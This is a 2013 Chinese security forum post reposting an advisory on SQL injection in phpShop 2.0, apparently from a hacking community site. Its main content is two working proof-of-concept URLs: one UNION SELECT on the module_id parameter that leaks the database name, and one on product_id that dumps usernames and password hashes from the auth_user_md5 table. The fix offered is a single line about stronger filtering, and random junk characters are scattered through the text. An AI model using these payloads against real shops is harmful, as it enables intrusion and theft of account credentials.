找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1935|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability# B0 R" M2 `0 G5 x$ A9 [5 [# N
* y4 }! [& d2 d9 b, h. {! S
作者 : By onestree! J6 F9 a: v) n7 ^3 g
下载地址 : http://code.google.com/p/phpshop/downloads/list2 Q5 Y1 c  g/ Y( M, }# j4 a
测试地址: windows 7 / ubuntu& O, a( ]1 Y2 x# c+ G% t  ^
7 \9 ^7 u4 j# r( e

  L' U0 U6 S: J0 u. ?SQLi p0c:
, w" V" U: X( I( t) y! O. U' e" Q
/ y4 O6 b: ]* B. {4 ~' v& i! P. Z==================
/ J( U" \5 u7 h/ B 9 ^' E, \+ t/ Y7 d; W, s
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'6 r& ^! s( y  s% o
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
& a. e) g9 Y7 L% L8 \% C$ e# g $ {  N  T4 G, P; O; o
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--9 Q6 ]9 f) t( D2 O% K% ^

' d, }6 n, N/ o修复:4 f! e7 B8 V) |! D4 P" {) P- ?
加强过滤! D2 d) N1 b3 g. v6 |; o  E

0 [+ i+ x8 m- c, M, a3 t$ H4 g" U+ F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表